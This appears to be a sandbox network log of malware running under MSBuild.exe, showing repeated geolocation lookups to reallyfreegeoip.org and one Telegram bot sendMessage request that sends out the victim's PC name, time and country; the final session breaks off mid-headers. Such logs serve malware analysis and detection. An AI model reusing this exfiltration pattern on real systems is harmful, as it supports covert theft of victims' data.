2024-12-14 12:49:41 UTC | 61 | OUT | GET /xml/8.46.123.189 HTTP/1.1
                                                                                                                            Host: reallyfreegeoip.org
2024-12-14 12:49:42 UTC | 878 | IN | HTTP/1.1 200 OK
                                                                                                                            Date: Sat, 14 Dec 2024 12:49:42 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 362
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=31536000
                                                                                                                            CF-Cache-Status: HIT
                                                                                                                            Age: 169351
                                                                                                                            Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mHwYGlMMH273zI7amlvU%2FYlG6Lz90U2wvJt%2F0xGyraO8aZPM%2FE7tWgJmVu0oD2nkYYjSJtyE3VNeXU%2Fiwp0SpM41w4njxAWfl4S1sPATXIChdzhvOSf9Vi64PB8dR14Z9b94CTpJ"}],"group":"cf-nel","max_age":604800}
                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                            Server: cloudflare
                                                                                                                            CF-RAY: 8f1e50be39b44231-EWR
                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1945&min_rtt=1878&rtt_var=752&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1554845&cwnd=127&unsent_bytes=0&cid=317d37351d0a1237&ts=454&x=0"
2024-12-14 12:49:42 UTC | 362 | IN
                                                                                                                            Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.6 | 49726 | 172.67.177.134 | 443 | 7252 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-14 12:49:45 UTC | 61 | OUT | GET /xml/8.46.123.189 HTTP/1.1
                                                                                                                            Host: reallyfreegeoip.org
2024-12-14 12:49:45 UTC | 884 | IN | HTTP/1.1 200 OK
                                                                                                                            Date: Sat, 14 Dec 2024 12:49:45 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 362
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=31536000
                                                                                                                            CF-Cache-Status: HIT
                                                                                                                            Age: 169354
                                                                                                                            Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=e53cQg%2FqgmTH9m7wZRH3UqilDUH38g6antX%2BWeu6khHxRH3fOibvwSYSPVxtKEsPmKh%2Fr3%2FBHIoiH92QH%2FWhNFCnR8Q9B%2B6k1goIsrKlrCgmJss%2F2ilxOqPXQATvVSiRBK15DWg2"}],"group":"cf-nel","max_age":604800}
                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                            Server: cloudflare
                                                                                                                            CF-RAY: 8f1e50d3bf151885-EWR
                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1519&min_rtt=1514&rtt_var=578&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1877813&cwnd=193&unsent_bytes=0&cid=86fd80e0535ee8d3&ts=453&x=0"
2024-12-14 12:49:45 UTC | 362 | IN | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.6 | 49730 | 172.67.177.134 | 443 | 7252 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-14 12:49:48 UTC | 61 | OUT | GET /xml/8.46.123.189 HTTP/1.1
                                                                                                                            Host: reallyfreegeoip.org
2024-12-14 12:49:48 UTC | 876 | IN | HTTP/1.1 200 OK
                                                                                                                            Date: Sat, 14 Dec 2024 12:49:48 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 362
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=31536000
                                                                                                                            CF-Cache-Status: HIT
                                                                                                                            Age: 169357
                                                                                                                            Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Gt1U%2BlMklbYvp5w9uFWdsST9oEsCxG0BVjFPEGBtDtLzHZW2T4j8buZhKogqsgNb%2F6EpxdSdfCQkjM6kH0izRICh0XfCb7F%2F6mlG1MQEooEct2nJWmnx1HJOL986QSy4TbngHg3k"}],"group":"cf-nel","max_age":604800}
                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                            Server: cloudflare
                                                                                                                            CF-RAY: 8f1e50e6dcb3efa5-EWR
                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=2032&min_rtt=2019&rtt_var=784&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1371535&cwnd=194&unsent_bytes=0&cid=70dc5a0a8efbc197&ts=450&x=0"
2024-12-14 12:49:48 UTC | 362 | IN | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.6 | 49734 | 172.67.177.134 | 443 | 7704 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-14 12:49:50 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
                                                                                                                            Host: reallyfreegeoip.org
                                                                                                                            Connection: Keep-Alive
2024-12-14 12:49:51 UTC | 878 | IN | HTTP/1.1 200 OK
                                                                                                                            Date: Sat, 14 Dec 2024 12:49:51 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 362
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=31536000
                                                                                                                            CF-Cache-Status: HIT
                                                                                                                            Age: 169360
                                                                                                                            Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yBpGqXlnK8BPBElhZ%2F4QSUt%2FplO8MZ%2FHSlLXI39QXCdWHDEwwTvZ9bgOB1KhExqCt4Ql1A18eg8briLKF5j5EEbPqxO8ctrn%2B9Fgj98VQazMvKROwprl0ZKwkds31c7AsRjvJOu6"}],"group":"cf-nel","max_age":604800}
                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                            Server: cloudflare
                                                                                                                            CF-RAY: 8f1e50f6b9d66a5f-EWR
                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1638&min_rtt=1632&rtt_var=624&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2850&recv_bytes=699&delivery_rate=1737061&cwnd=187&unsent_bytes=0&cid=e4e46669f848c894&ts=454&x=0"
2024-12-14 12:49:51 UTC | 362 | IN | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.6 | 49735 | 172.67.177.134 | 443 | 7252 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-14 12:49:51 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
                                                                                                                            Host: reallyfreegeoip.org
                                                                                                                            Connection: Keep-Alive
2024-12-14 12:49:51 UTC | 872 | IN | HTTP/1.1 200 OK
                                                                                                                            Date: Sat, 14 Dec 2024 12:49:51 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 362
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=31536000
                                                                                                                            CF-Cache-Status: HIT
                                                                                                                            Age: 169360
                                                                                                                            Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nZ91IrNutCXxBQILeNrNsDb77qkI3bTysXnIIm4oYcnhMRquA7Xw6u3Vqpc1otSnPN7PsvkxYanK2gxXXR1Gn2l84jtX4cslRHiX%2FE2p1MB1oABtFbmaEBtYOJuRzeGphrhP3oE3"}],"group":"cf-nel","max_age":604800}
                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                            Server: cloudflare
                                                                                                                            CF-RAY: 8f1e50fa282342e8-EWR
                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=2233&min_rtt=2232&rtt_var=840&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1300668&cwnd=250&unsent_bytes=0&cid=28b6ca617b33a2fc&ts=457&x=0"
2024-12-14 12:49:51 UTC | 362 | IN | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.6 | 49736 | 172.67.177.134 | 443 | 7704 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-14 12:49:52 UTC | 61 | OUT | GET /xml/8.46.123.189 HTTP/1.1
                                                                                                                            Host: reallyfreegeoip.org
2024-12-14 12:49:53 UTC | 874 | IN | HTTP/1.1 200 OK
                                                                                                                            Date: Sat, 14 Dec 2024 12:49:53 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 362
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=31536000
                                                                                                                            CF-Cache-Status: HIT
                                                                                                                            Age: 169362
                                                                                                                            Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aVGZ38zgXEi2QqtHVWA5SzRwwXmxSJG6I6YwzZ8yEaHJjTBFbNARAQTyNDbbBHEGzNIIo%2BVkPf%2FE0HOD7UdweG1UXNAVtIsyVVy2iCU9IclsP97v5wctY4cKzMcqVDuEDBPRFveV"}],"group":"cf-nel","max_age":604800}
                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                            Server: cloudflare
                                                                                                                            CF-RAY: 8f1e5103b8a043b8-EWR
                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1591&min_rtt=1584&rtt_var=608&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=699&delivery_rate=1777236&cwnd=231&unsent_bytes=0&cid=ade79fc1acf9e12c&ts=463&x=0"
2024-12-14 12:49:53 UTC | 362 | IN | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.6 | 49739 | 172.67.177.134 | 443 | 7252 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-14 12:49:54 UTC | 61 | OUT | GET /xml/8.46.123.189 HTTP/1.1
                                                                                                                            Host: reallyfreegeoip.org
2024-12-14 12:49:54 UTC | 876 | IN | HTTP/1.1 200 OK
                                                                                                                            Date: Sat, 14 Dec 2024 12:49:54 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 362
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=31536000
                                                                                                                            CF-Cache-Status: HIT
                                                                                                                            Age: 169363
                                                                                                                            Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=r3CKf4K03MDnwdJ%2BryhYNPXyqaG4bLdxxSod9PqhiJOHa4ffWixwXgbclpFlBV1jvRZWaU1hoP%2FuUl3eIg56sbvOJzMP1QM8a%2F2v2hVmg3IknNquzwTHd1eGVBjgETLuldohXK6r"}],"group":"cf-nel","max_age":604800}
                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                            Server: cloudflare
                                                                                                                            CF-RAY: 8f1e510d5caa0f77-EWR
                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1554&min_rtt=1495&rtt_var=603&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1953177&cwnd=231&unsent_bytes=0&cid=d0634031c54000e1&ts=449&x=0"
2024-12-14 12:49:54 UTC | 362 | IN | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.6 | 49742 | 172.67.177.134 | 443 | 7704 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-14 12:49:56 UTC | 61 | OUT | GET /xml/8.46.123.189 HTTP/1.1
                                                                                                                            Host: reallyfreegeoip.org
2024-12-14 12:49:56 UTC | 871 | IN | HTTP/1.1 200 OK
                                                                                                                            Date: Sat, 14 Dec 2024 12:49:56 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 362
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=31536000
                                                                                                                            CF-Cache-Status: HIT
                                                                                                                            Age: 169365
                                                                                                                            Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=95gJKLNZYt%2Bj8pD21fj1L4HiDmQI4P6PcOZoUn6xmjFuR5fSLcQ9Fxaca4KJ8TFAvT9G1Lc9b7WpJV9IYwHw9oi7UjeRHcJ2iqBVjdNes3ft1Q7ZsNMUY3llNbXLPnmp2EPlOupF"}],"group":"cf-nel","max_age":604800}
                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                            Server: cloudflare
                                                                                                                            CF-RAY: 8f1e51183aea32fc-EWR
                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1903&min_rtt=1903&rtt_var=951&sent=5&recv=7&lost=0&retrans=1&sent_bytes=4236&recv_bytes=699&delivery_rate=286611&cwnd=226&unsent_bytes=0&cid=8a39acc19534a4e7&ts=482&x=0"
2024-12-14 12:49:56 UTC | 362 | IN |
                                                                                                                            Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.6 | 49743 | 172.67.177.134 | 443 | 7252 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-14 12:49:57 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
                                                                                                                            Host: reallyfreegeoip.org
                                                                                                                            Connection: Keep-Alive
2024-12-14 12:49:58 UTC | 878 | IN | HTTP/1.1 200 OK
                                                                                                                            Date: Sat, 14 Dec 2024 12:49:57 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 362
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=31536000
                                                                                                                            CF-Cache-Status: HIT
                                                                                                                            Age: 169366
                                                                                                                            Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nEmIyjjF9F1AG41pvNOBxmyGO1%2B2jFgJOMrZCNuOko1AzPem3WBrQKOT0nxQwayMlKo23OQ51bFc3CB3WP4iCqMCfOjpHb%2B2PMkIPDUBvnft5PoPi%2BdPQnL7lmwJ%2FALizrK8keus"}],"group":"cf-nel","max_age":604800}
                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                            Server: cloudflare
                                                                                                                            CF-RAY: 8f1e51211d8f42b7-EWR
                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1595&min_rtt=1587&rtt_var=612&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1764350&cwnd=212&unsent_bytes=0&cid=5368a7e43b2626b1&ts=455&x=0"
2024-12-14 12:49:58 UTC | 362 | IN |
                                                                                                                            Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.6 | 49747 | 172.67.177.134 | 443 | 7704 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-14 12:49:59 UTC | 61 | OUT | GET /xml/8.46.123.189 HTTP/1.1
                                                                                                                            Host: reallyfreegeoip.org
2024-12-14 12:49:59 UTC | 880 | IN | HTTP/1.1 200 OK
                                                                                                                            Date: Sat, 14 Dec 2024 12:49:59 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 362
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=31536000
                                                                                                                            CF-Cache-Status: HIT
                                                                                                                            Age: 169368
                                                                                                                            Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4xsozOnIuj%2FRknCAwo9gSAaA00JFuPf%2FiQ6YjGAxjbLkLoZCMKGMD3UyWinfYtgqHi%2FEB7AQaD48kMwzEK9B4XoA3vV774PISlD5VCJY4B4wkLEI%2FUH8pH3QWxtS%2FvEko8j9vOO5"}],"group":"cf-nel","max_age":604800}
                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                            Server: cloudflare
                                                                                                                            CF-RAY: 8f1e512cf9e85e60-EWR
                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1592&min_rtt=1587&rtt_var=605&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1792510&cwnd=248&unsent_bytes=0&cid=f0fa7d32633258ce&ts=456&x=0"
2024-12-14 12:49:59 UTC | 362 | IN |
                                                                                                                            Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.6 | 49748 | 172.67.177.134 | 443 | 7252 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-14 12:50:00 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
                                                                                                                            Host: reallyfreegeoip.org
                                                                                                                            Connection: Keep-Alive
2024-12-14 12:50:01 UTC | 882 | IN | HTTP/1.1 200 OK
                                                                                                                            Date: Sat, 14 Dec 2024 12:50:01 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 362
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=31536000
                                                                                                                            CF-Cache-Status: HIT
                                                                                                                            Age: 169370
                                                                                                                            Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hXb2UujSXYbuISUxXjB51iOD88%2BtorswaXFQYgYuTh0vWAO%2BPZxKuQ%2BSEXfshqIafMAvKqOJZUl%2F1U%2FcaTEFViZC%2BNn8OxiWavkzD7IV1aUTams9BisvwVacQxkeUatzKSv4FmBo"}],"group":"cf-nel","max_age":604800}
                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                            Server: cloudflare
                                                                                                                            CF-RAY: 8f1e51344f4f1831-EWR
                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1608&min_rtt=1512&rtt_var=635&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2850&recv_bytes=699&delivery_rate=1931216&cwnd=235&unsent_bytes=0&cid=d5303baf0feca01a&ts=454&x=0"
2024-12-14 12:50:01 UTC | 362 | IN |
                                                                                                                            Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.6 | 49752 | 172.67.177.134 | 443 | 7704 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-14 12:50:06 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
                                                                                                                            Host: reallyfreegeoip.org
                                                                                                                            Connection: Keep-Alive
2024-12-14 12:50:06 UTC | 876 | IN | HTTP/1.1 200 OK
                                                                                                                            Date: Sat, 14 Dec 2024 12:50:06 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 362
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=31536000
                                                                                                                            CF-Cache-Status: HIT
                                                                                                                            Age: 169375
                                                                                                                            Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2Bz19AOXQ0mYh8OAF9OFS6BaC1tbFnBPuXeGlREPn7vi5S%2FwnzUwjWO49G3tOppZXcWWRQBAkxRBPC%2BIFLkxi5681nxcy143WCZmu1YUeclVsQp2nVSN8B02EhClZzcwHEgYE5JO2"}],"group":"cf-nel","max_age":604800}
                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                            Server: cloudflare
                                                                                                                            CF-RAY: 8f1e51575c634210-EWR
                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1780&min_rtt=1765&rtt_var=673&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1654390&cwnd=244&unsent_bytes=0&cid=a5b1238111dc0430&ts=455&x=0"
2024-12-14 12:50:06 UTC | 362 | IN |
                                                                                                                            Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.6 | 49754 | 172.67.177.134 | 443 | 7252 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-14 12:50:10 UTC | 61 | OUT | GET /xml/8.46.123.189 HTTP/1.1
                                                                                                                            Host: reallyfreegeoip.org
2024-12-14 12:50:10 UTC | 872 | IN | HTTP/1.1 200 OK
                                                                                                                            Date: Sat, 14 Dec 2024 12:50:10 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 362
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=31536000
                                                                                                                            CF-Cache-Status: HIT
                                                                                                                            Age: 169379
                                                                                                                            Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aDeiDgAZv8ico3YhfWm6oMhP3zzNAVcgH%2B4Hu3bpQSLJXjDP74ksIWWTI8YPPX4v6AdeLLZxugGd36fgUi60dogqKG7TFMZNsE2rYx2ODyUnnuteJsZN0hiU3XrnLQCGUDr2hT3f"}],"group":"cf-nel","max_age":604800}
                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                            Server: cloudflare
                                                                                                                            CF-RAY: 8f1e51707cf5c459-EWR
                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1551&min_rtt=1463&rtt_var=724&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1347485&cwnd=231&unsent_bytes=0&cid=c3f6ffe25a90ef56&ts=458&x=0"
2024-12-14 12:50:10 UTC | 362 | IN |
                                                                                                                            Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.6 | 49755 | 149.154.167.220 | 443 | 7252 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-14 12:50:12 UTC | 349 | OUT | GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:226533%0D%0ADate%20and%20Time:%2015/12/2024%20/%2013:48:37%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20226533%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                                                                                            Host: api.telegram.org
                                                                                                                            Connection: Keep-Alive
2024-12-14 12:50:12 UTC | 344 | IN | HTTP/1.1 404 Not Found
                                                                                                                            Server: nginx/1.18.0
                                                                                                                            Date: Sat, 14 Dec 2024 12:50:12 GMT
                                                                                                                            Content-Type: application/json
                                                                                                                            Content-Length: 55
                                                                                                                            Connection: close
                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-14 12:50:12 UTC | 55 | IN |
                                                                                                                            Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.6 | 49757 | 172.67.177.134 | 443 | 7704 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-14 12:50:18 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
2024-12-14 12:50:18 UTC | 878 | IN | HTTP/1.1 200 OK
                                                                                                                            Date: Sat, 14 Dec 2024 12:50:18 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 362
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=31536000
                                                                                                                            CF-Cache-Status: HIT
                                                                                                                            Age: 169387
                                                                                                                            Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
                                                                                                                            Accept-Ranges: bytes
